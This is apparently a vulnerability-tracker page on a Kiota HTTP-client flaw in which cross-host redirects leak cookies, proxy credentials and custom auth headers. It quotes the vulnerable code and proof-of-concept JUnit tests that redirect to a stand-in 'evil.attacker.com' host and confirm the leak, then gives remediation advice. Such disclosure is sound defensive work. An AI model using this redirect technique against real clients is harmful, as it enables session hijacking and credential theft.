Skip to main content

Microsoft Kiota EUVDEUVD-2026-30323

| CVE-2026-44503 HIGH
URL Redirection to Untrusted Site (Open Redirect) (CWE-601)
2026-05-07 https://github.com/microsoft/kiota-java GHSA-7j59-v9qr-6fq9
7.0
CVSS 4.0 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
7.0 HIGH
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
P
Scope
X

Lifecycle Timeline

6
Analysis Updated
May 14, 2026 - 16:29 vuln.today
v2 (cvss_changed)
Re-analysis Queued
May 14, 2026 - 16:22 vuln.today
cvss_changed
CVSS changed
May 14, 2026 - 16:22 NVD
7.0 (HIGH)
Source Code Evidence Fetched
May 07, 2026 - 02:16 vuln.today
Analysis Generated
May 07, 2026 - 02:16 vuln.today
CVE Published
May 07, 2026 - 01:49 nvd
HIGH

Blast Radius

ecosystem impact
† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth
  • 9 maven packages depend on com.microsoft.kiota:microsoft-kiota-abstractions (7 direct, 2 indirect)
  • 2 pypi packages depend on microsoft-kiota-http (0 direct, 2 indirect)

Ecosystem-wide dependent count for version 1.9.1 and other introduced versions.

DescriptionGitHub Advisory

Summary

The RedirectHandler middleware in microsoft/kiota-java (com.microsoft.kiota:microsoft-kiota-http-okHttp v1.9.0) and other Kiota libraries fails to strip sensitive HTTP headers when following 3xx redirects to a different host or scheme.

This vulnerability is present in the RedirectHandlers for:

https://github.com/microsoft/kiota-dotnet https://github.com/microsoft/kiota-java https://github.com/microsoft/kiota-python https://github.com/microsoft/kiota-typescript https://github.com/microsoft/kiota-http-go

Details

Only the Authorization header is removed; Cookie, Proxy-Authorization, and all custom headers are forwarded to the redirect target.

This is the default middleware in every kiota-java HTTP client created via KiotaClientFactory.create(). OkHttp's built-in redirect handler (which handles this correctly) is explicitly disabled at line 63 of KiotaClientFactory.java in favor of kiota's broken implementation.

Vulnerable code in RedirectHandler.java lines 107-116 (getRedirect method) in versions 1.90 and earlier:

boolean sameScheme = locationUrl.scheme().equalsIgnoreCase(requestUrl.scheme());
boolean sameHost = locationUrl.host().toString().equalsIgnoreCase(requestUrl.host().toString());
if (!sameScheme || !sameHost) {
requestBuilder.removeHeader("Authorization");
// BUG: Cookie, Proxy-Authorization, and all other headers are NOT removed
}

PoC

  1. Clone the repository:

git clone --depth 1 https://github.com/microsoft/kiota-java.git cd kiota-java

  1. Create the PoC test file at:

components/http/okHttp/src/test/java/com/microsoft/kiota/http/middleware/SecurityPoC.java

With this content:

package com.microsoft.kiota.http.middleware;
import static org.junit.jupiter.api.Assertions.*;
import com.microsoft.kiota.http.KiotaClientFactory;
import okhttp3.*;
import okhttp3.mockwebserver.*;
import org.junit.jupiter.api.Test;

public class SecurityPoC {
@Test
void crossHostRedirectLeaksCookies() throws Exception {
Request original = new Request.Builder()
.url("http://trusted.example.com/api")
.addHeader("Authorization", "Bearer token")
.addHeader("Cookie", "session=SECRET")
.addHeader("Proxy-Authorization", "Basic cHJveHk6cGFzcw==")
.build();
Response redirect = new Response.Builder()
.request(original).protocol(Protocol.HTTP_1_1)
.code(302).message("Found")
.header("Location", "http://evil.attacker.com/steal")
.body(ResponseBody.create("", MediaType.parse("text/plain")))
.build();
Request result = new RedirectHandler().getRedirect(original, redirect);
assertNotNull(result);
assertEquals("evil.attacker.com", result.url().host());
assertNull(result.header("Authorization")); // stripped (good)
assertEquals("session=SECRET", result.header("Cookie")); // LEAKED
assertEquals("Basic cHJveHk6cGFzcw==", result.header("Proxy-Authorization")); // LEAKED
}

@Test
void endToEndProof() throws Exception {
var evil = new MockWebServer();
evil.start();
evil.enqueue(new MockResponse().setResponseCode(200));
var trusted = new MockWebServer();
trusted.start();
trusted.enqueue(new MockResponse().setResponseCode(302)
.setHeader("Location", evil.url("/steal")));
OkHttpClient client = KiotaClientFactory.create(
new Interceptor[]{new RedirectHandler()}).build();
client.newCall(new Request.Builder().url(trusted.url("/api"))
.addHeader("Cookie", "session=SECRET").build()).execute();
trusted.takeRequest();
RecordedRequest captured = evil.takeRequest();
assertEquals("session=SECRET", captured.getHeader("Cookie")); // LEAKED to evil server
evil.shutdown();
trusted.shutdown();
}
}
  1. Run the tests:

./gradlew :components:http:okHttp:test --tests "com.microsoft.kiota.http.middleware.SecurityPoC"

  1. Result: BUILD SUCCESSFUL, 2 tests passed, 0 failures.

Both tests confirm Cookie and Proxy-Authorization headers are sent to the attacker's server on cross-host redirect.

Impact

The kiota-java bug is more severe because it leaks ALL sensitive headers simultaneously (Cookie + Proxy-Authorization + custom auth headers), not just one type.

Attack scenario: An attacker who can trigger a cross-origin redirect from a trusted API (via open redirect, MITM, or DNS rebinding) captures the victim's session cookies, proxy credentials, and API keys from the redirected request.

Impact:

  • Session hijacking via leaked Cookie headers
  • Corporate proxy credential theft via leaked Proxy-Authorization
  • API key theft via leaked custom auth headers (X-API-Key, etc.)

All consumers of kiota-java are affected, including Microsoft Graph SDK for Java.

AnalysisAI

Cross-host HTTP redirects in Microsoft Kiota HTTP client libraries leak session cookies, proxy credentials, and custom authentication headers to attacker-controlled domains. When Kiota's RedirectHandler middleware follows 3xx redirects to different hosts (e.g., trusted.example.com → evil.attacker.com), it strips the Authorization header but forwards Cookie, Proxy-Authorization, and all custom headers unchanged. Publicly available exploit code exists with a complete proof-of-concept demonstrating cookie exfiltration to malicious redirect targets. This affects all Kiota language implementations (Java, .NET, Python, TypeScript, Go) and downstream consumers including Microsoft Graph SDK for Java. The vulnerability requires user interaction to trigger the initial API request, but once triggered, credential leakage is automatic on cross-origin redirects (CVSS:4.0 AV:N/AC:L/AT:P/PR:N/UI:P). Vendor-released patches are available across all affected package ecosystems.

Technical ContextAI

Microsoft Kiota is a code generation framework that produces HTTP client libraries for consuming OpenAPI-defined REST APIs. The vulnerability exists in Kiota's custom RedirectHandler middleware, which is injected by default into HTTP clients via KiotaClientFactory across all language implementations. The RedirectHandler is implemented to override native HTTP library redirect behavior (e.g., OkHttp in Java explicitly disables its compliant redirect handler at KiotaClientFactory.java line 63). When processing HTTP 3xx redirect responses, the middleware compares the original request URL's scheme and host against the Location header's target. If they differ, it removes only the Authorization header per RFC 7231 Section 6.4 guidance, but fails to apply the same sanitization to other credentials-bearing headers. The root cause maps to CWE-601 (URL Redirection to Untrusted Site), though the impact is credential disclosure rather than phishing. CPE data identifies affected packages across Maven (com.microsoft.kiota:microsoft-kiota-abstractions), NuGet (Microsoft.Kiota.Abstractions), PyPI (microsoft-kiota-http), npm (@microsoft/kiota-http), and Go (github.com/microsoft/kiota-http-go). The vulnerable code pattern appears in RedirectHandler.java lines 107-116 (versions ≤1.9.0) and equivalent implementations in kiota-dotnet, kiota-python, kiota-typescript, and kiota-http-go repositories.

RemediationAI

Upgrade to patched versions immediately: for Java Maven projects, update com.microsoft.kiota:microsoft-kiota-abstractions to version 1.9.1 or later; for .NET NuGet projects, update Microsoft.Kiota.Abstractions to 1.22.0 or later; for Python PyPI projects, update microsoft-kiota-http to 1.9.9 or later; for TypeScript npm projects, update @microsoft/kiota-typescript to 1.0.0-preview.100 or later. Consult https://github.com/microsoft/kiota-java/security/advisories/GHSA-7j59-v9qr-6fq9 for language-specific upgrade guidance. If immediate patching is not feasible, implement application-layer redirect validation by subclassing or replacing the RedirectHandler middleware to enforce strict same-origin policy for redirects (reject all cross-host 3xx responses or strip all headers matching Cookie, Proxy-Authorization, and custom auth patterns via regex before following redirects). Note this workaround breaks legitimate cross-domain API flows and may cause functional regressions in multi-domain API architectures. Network-layer mitigations include deploying egress filtering to block outbound requests to untrusted domains from API client hosts, though this does not prevent credential leakage to attacker-controlled subdomains of trusted parent domains. For high-risk environments, disable automatic redirect following entirely by configuring HTTP clients with followRedirects(false) and handle redirects manually with explicit credential stripping logic, trading developer complexity for security guarantees.

More in Python

View all
CVE-2025-24016 CRITICAL POC
9.9 Feb 10

Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t

CVE-2025-27520 CRITICAL POC
9.8 Apr 04

BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser

CVE-2025-2945 CRITICAL POC
9.9 Apr 03

pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi

CVE-2013-5093 MEDIUM POC
6.8 Sep 27

The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python

CVE-2025-32375 CRITICAL POC
9.8 Apr 09

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica

CVE-2014-0224 HIGH POC
7.4 Jun 05

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph

CVE-2024-21644 HIGH POC
7.5 Jan 08

pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.

CVE-2017-9462 HIGH POC
8.8 Jun 06

In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2024-21645 MEDIUM POC
5.3 Jan 08

pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne

CVE-2026-33017 CRITICAL POC
9.3 Mar 17

Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301

CVE-2026-55255 HIGH POC
8.4 Jun 19

Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing

Share

EUVD-2026-30323 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy